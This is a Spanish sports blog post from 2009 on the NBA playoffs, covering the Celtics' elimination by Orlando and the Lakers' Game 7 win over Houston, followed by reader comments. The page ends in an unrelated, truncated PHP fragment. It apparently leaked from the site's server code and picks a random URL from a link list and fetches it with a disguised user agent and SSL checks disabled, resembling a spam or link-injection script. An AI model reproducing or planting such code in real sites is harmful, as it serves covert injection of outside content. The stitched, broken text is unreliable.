Playoffs (17/05/2009): Rumbos diferentes

18 de May de 2009 por MagicJohnson32

Llevábamos un tiempo comentando los paralelismos entre los caminos de Lakers y Celtics en estos Playoffs. Anoche, finalmente, los dos equipos que el año pasado se disputaron el Anillo tomaron rumbos diferentes: los angelinos, hacia las finales de Conferencia contra los Nuggets; los verdes, hacia unas largas y merecidas vacaciones.

Para los Celtics, la derrota de anoche ante Orlando Magic supone el final a una aventura, unos Playoffs sin Kevin Garnett en los que ya pueden darse por satisfechos. Han tirado de carácter y de épica hasta que eso ha dejado de ser suficiente. Los Magic acabaron imponiendo su mayor calidad y se llevaron sin excesivos problemas la victoria en el partido decisivo. Apareció la mejor versión de Turkoglu, amo y señor del encuentro con 25 puntos, 12 asistencias y 5 rebotes, y Orlando no necesitó mucho más para dominar de principio a fin. Howard contribuyó con 12 puntos, 16 rebotes y 5 tapones, Alston, Lewis y Pietrus anotaron más de 15 puntos cada uno, y por los locales apenas Ray Allen estuvo a la altura de las circunstancias con 23 puntos. Ni Pierce ni Rondo pudieron marcar diferencias y los Celtics finalmente se toparon con la realidad, con algo que ya sabían desde que se confirmó la lesión de Garnett pero que, hasta ayer, se habían resistido a asumir: el Anillo era un sueño. Al menos fue bonito mientras duró. A los Magic les llega el gran obstáculo, LeBron y sus Cavaliers. El miércoles será el primer partido de la serie. ¿Pondrán fin Dwight & Co. al paseo que hasta el momento han sido los Playoffs para Cleveland? Hará falta mucha magia para eso.

Lo de los Lakers, pese a todos los paralelismos, ha sido bien diferente. Jamás debieron llegar hasta el séptimo partido. Con Yao y más aún sin él, los Rockets no son rival para el equipo de Phil Jackson. Será el exceso de confianza, será que Adelman ha superado con creces a Jackson, será que la diferencia de plantillas no es tanta o que el baloncesto siempre nos reserva una sorpresa (o dos, o tres), la cuestión es que Lakers y Rockets se jugaban anoche a una carta el pase a las finales de Conferencia, donde aguardan los Nuggets. Y sucedió lo mismo que en las tres victorias previas de los angelinos: dominio aplastante, evidencia clara de que los Lakers han jugado innecesariamente con fuego. Ante la amenaza de incendio, los campeones de la Pacific Division salieron con las ideas claras y con la decisión de la que han carecido en otras ocasiones. Buscaron a Gasol -gigante con 21 puntos, 18 rebotes y 3 tapones- y a Bynum (14 puntos, 6 rebotes, 2 tapones), que arrasaron a Hayes, Scola y Landry, y abrieron brecha de forma inmediata (0-8). La diferencia fue creciendo, alcanzó los 20 puntos al descanso y llegó a ser de 31 a poco para el final. La incógnita ahora es saber si los Lakers son capaces de mantener la tensión que a buen seguro exigirá la cita ante los Nuggets. A partir del martes lo descubriremos.

PREMIOS

MVP:Ex-aquo para los 2 jugadores más destacados de sus equipos en la victoria. Por un lado los 25 puntos (9 de 12 en tiro, 4 de 5 en triples), 5 rebotes y 12 asistencias de Hedo Turkoglu. Por el otro, los 21 puntos y 18 rebotes de Pau Gasol. ¡Europa manda!

Sorpresa: Hace unos días apostábamos que la fortaleza mental de Boston sería demasiado para Orlando en el séptimo partido y no pudimos equivocarnos más. Llegaron igualados al último cuarto y allí, sorprendentemente, se impusieron los de Florida. Y con Pietrus destacado: 17 puntos y 3 de 3 en triples.

Decepción: Flojo, flojísimo partido de unos Rockets a los que se les acabó la gasolina en el último momento. Entre Brooks, Artest y Scola sólo anotaron 11 de sus 35 lanzamientos.

Esfuerzo en vano: Por fin apareció Ray Allen en la serie pero lo hizo tarde y no a un nível sobrenatural. 23 puntitos que no sirvieron de nada, como los 16 rebotes de Perkins o los 10 puntos y 10 asistencias de Rondo. Para casa todos.

RAZONES PARA TRASNOCHAR

Tendremos que esperar hasta el martes para que den comienzo las finales de conferencia y lo harán con un espectacular Lakers-Nuggets. Unos minutitos antes se llevará a cabo el tradicional sorteo del draft. Veremos a qué equipos les funciona eso de “dejarse perder”.

Comenta

4 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Del partido que yo ví, el Rockets@Lakers… los Lakers salieron más puestos en defensa. Muy buenos los cambios tras bloqueo y continuación, muy buena la distancia con cada atacante, muy atentos a las líneas de pase y muy sólidos debajo, con Gasol y Kobe titánicos. Los demás también muy bien.
    Pero muy mal los Rockets que salieron entregados y desacertadísimos. Pobrísimo el tiro a canasta… y eso siempre da alas a la defensa. Mención especial a Ron Artest… ufff!!!

    En ataque los Lakers no hicieron nada del otro jueves. Eso sí, por primera vez en toda la eliminatoria el primer pase a Pau SIEMPRE. Pau estuvo bastante inoperante al principio, pero insistente… y Bynum muy bien cargando dentro. Esos 7 pies de cada uno hicieron polvo la defensa de Houston… y a medida que fueron pasando los minutos terminaron por demolerla y Gasol entonces se puso las botas.

    Kobe tampoco estuvo especialmente fino… pero sí fue insistiendo en el problema de faltas de Battier (algo que tampoco se ha hecho en toda la eliminatoria) y lo terminó por sacar del partido. A partir de ahí tampoco es que tuviera que matarse a anotar anoche. De hecho descansó bastante… porque por un día Vujacic lo hizo bien.

    Además de Bynum, Ariza fantástico, Fisher bien cumpliendo y Odom muy concreto. Sin hacer el chorra.
    Bien los Lakers pero sin pasarse.
    Ahora a seguir mejorando contra los Nuggets, porque lo necesitaremos de verdad…

      Citar

  2. kantonyo dice:
    #2

    Vaya!! dos europeos decidiendo el pase de sus equipos a las finales de conferencia.

      Citar

  3. Viva_Dirk dice:
    #3

    Los mas importante del partido de ayer es la recuperación de Bynum para la causa. Uno de los puntos que mas diferencia a los Lakers que han ganado facil a los Rockets con los que han perdido de paliza es que Andrew esté enchufado sobre todo en defensa, sin tener que llegar a taponar pero estando rápido y atento.

    Se presentan preciosas ambas finales, con el favorito de cada conferencia y dos equipos con armas para hacerles daño de verdad.

      Citar

  4. MagicJohnson32 dice:
    #4

    Bynum es determinante, tanto por lo que hace como porque permite a Pau pasar más tiempo en el puesto de 4, donde marca más diferencias. Si da la cara contra Nené y los Nuggets, los Lakers tendrán mucho ganado.

    Es verdad que anoche se le vio mucho mejor tanto en confianza como en físico. Por fin lo vimos jugar bastante por encima de los aros y correr algún contraataque. Que dure.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>